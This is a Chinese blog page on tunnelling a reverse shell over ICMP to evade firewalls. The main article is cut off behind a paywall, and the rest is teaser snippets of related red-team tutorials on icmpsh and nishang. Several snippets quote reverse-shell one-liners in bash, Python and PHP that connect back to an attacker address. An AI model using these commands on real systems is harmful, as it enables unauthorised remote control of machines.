利用ICMP协议反弹shell

最新推荐文章于 2024-09-07 13:13:56 发布
最新推荐文章于 2024-09-07 13:13:56 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 【二】攻击技术剖析·漏洞原理·红队 文章标签: 反弹shell 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37865996/article/details/125891811
版权

简述

网络管理员通常使用各种各样的防火墙,以拦截各类渗透测试动作,如某防火墙允许已知的机器流量在端口和服务(入口过滤),并拥有强大的出口访问控制列表的设置。然而很多时候,为了方便运维管理,在各种安全策略中,ICMP协议通常是不会过滤的,通俗点说就是不会禁PING。

ICMP(Internet Control Message Protocol)Internet控制报文协议,是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。如果在目标主机建立一个shell的管道,通过ICMP数据部分来传输协议即可实现远控过程中所需的数据交互。

服务端代码

Windows服务端:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include &
了解本专栏 订阅专栏 解锁全文 超级会员免费看
内网隧道代理技术(二十五)之 ICMP隧道反弹SHELL
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-14 369
由于ICMP报文自身可以携带数据,而且ICMP报文是由系统内核处理的,不占用任何端口,因此具有很高的隐蔽性。把数据隐藏在ICMP数据包包头的data字段中,建立隐蔽通道,可以实现绕过防火墙和入侵检测系统的阻拦。
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 811
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
icmp实现shell反弹
qq_45833409的博客
02-01 326
#概述 1.创建原始套接字(icmp),分别为发送端和接收端,另外再起一个进程绑定一个端口进行tcp监听。 2.发送端向接收端发送icmp包后,接收端过滤icmp包后获得发送端发出的icmp包再解包和解密,当口令正确,解析icmp_data段的ip和port。 3.拿到ip和port后,创建一个tcp套接字去connect这个addr,连接成功后将stdin,stdout,stderr重定向到创建的套接字中,再execl反弹shell就完成了. 源码 发送端 #include <stdio.h&gt
icmpsh之icmp反弹shell
weixin_45729208的博客
03-31 407
一,技术原理 向ping www.baidu.com时,本机会先向百度的服务器发送ICMP请求包,如果请求成功了,则百度服务器会回应ICMP的响应包 引用百度百科: ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 二,实验环境 攻击机
nishangICMP反弹shell攻击
wodepzw的博客
11-19 324
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 2.用管理员权限打开powe...
icmp反弹shell 简介
whatday的专栏
04-09 1050
目录 第一节 轶事 第二节 技术原理 第三节 ICMP反弹shell 第一节 轶事 首次听说icmp隧道,要从免费上网说起。当年的网费还是挺贵的,大学生上个网还是容易“破产”呀。当你的网费耗尽后,网管服务器就会拦截你的网络请求,但是只拦截了TCP和UDP协议,放过了ICMP协议,ping ip还是可以的,于是就开始琢磨利用icmp隧道将访问转发到自己的一台放置在公网中的代理,利用代...
内网渗透之 ICMP(icmpsh) 协议反弹Shell
The current road is different, love needs to distinguish between right and wrong
04-09 5152
简介 最常见的ICMP消息为Ping命令的回复,通过ping命令访问远程计算机,尝试进行ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(通常防火墙不会屏蔽ping数据包)。 常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。 这里使用 icmpsh跨平台工具,python版本 < python3。 实验环境 kali:192.168.95.128 windows7:192.168.9
利用ICMP反弹shell过程复现
xxwn200301的博客
08-09 223
一、概述通常,网络管理员会使用各种各样的防火墙,通过访问控制列表来限制网络访问,对渗透测试会造成非常大的困难,而为了来获得reverseshell,而ICMP就是解决这个问题的重点,icmpsh是一个简单的reverse ICMP shell,它分别用C(icmpsh-m.c)、Perl(icmpsh-m.pl)、Python(icmpsh_m.py)使win32.slave兼容原始POSIX。它比其它类似的开源工具的主要优点是,它并不需要管理员权限就能运行到目标机器上。
网络安全 day5 --- 反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
最新发布
2302_81156108的博客
09-07 2236
学习网络安全的一些心得希望对大家起到一些帮助
通过ICMP协议反弹SHELL并执行命令
Fly_鹏程万里
05-23 3749
前言内网中的大多数系统都位于防火墙和企业代理之后,以便控制入口以及出口流量。防火墙可以拦截到反连的shell,但ICMP协议基本上是不拦截的。因此,为了获得shell并在目标主机上执行命令,可以使用ICMP协议作为隐藏通道进行连接。使用icmpsh(https://github.com/inquisb/icmpsh)工具可用来执行此攻击。推特上的大牛@Bernardo Damele已经将其导入到他...
icmp协议_利用ICMP(icmpsh)协议反弹Shell 渗透红队笔记
weixin_39872257的博客
12-01 415
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 十篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),每周一更。ICMP隧道‍ICMP隧道是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定要开放端口,而在ICMP协议下就不需要。最常见的ICMP消息为Ping命令的回复,攻击者可以利用命令得到比回复更多的ICMP请求。在通常情况下...
我眼中的nishangICMP反弹shell攻击
ovowovo的博客
11-29 452
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 在这里插入图片描述 2.用...
反弹shell
chenkaifang的博客
07-14 275
参考链接: https://xz.aliyun.com/t/2549 1、介绍 reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接...
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1462
ICMP隧道 最常见的ping命令就是利用ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
linux下反弹shell的几种方式
Ping_Pig的博客
10-24 548
实验环境: 两台kali 方法一: bash -i >& /dev/tcp/ip/port 0>&1 nc -lvvp port 方法二 python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192...
nishangICMP反弹shell攻击日志分析
weixin_44253823的博客
11-08 722
ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。 攻击过程复现。 复现环境 win7:192.168.0.73。powershell导入nishang框架。https://blog.youkuaiyun.com/weixin_44253823/article/details/102972355 kali:192.168.0.162。安装icmpsh工具。 https://gi...
shell反弹的几种方式
nextdoor6的博客
05-16 5914
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

东方隐侠安全团队-千里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值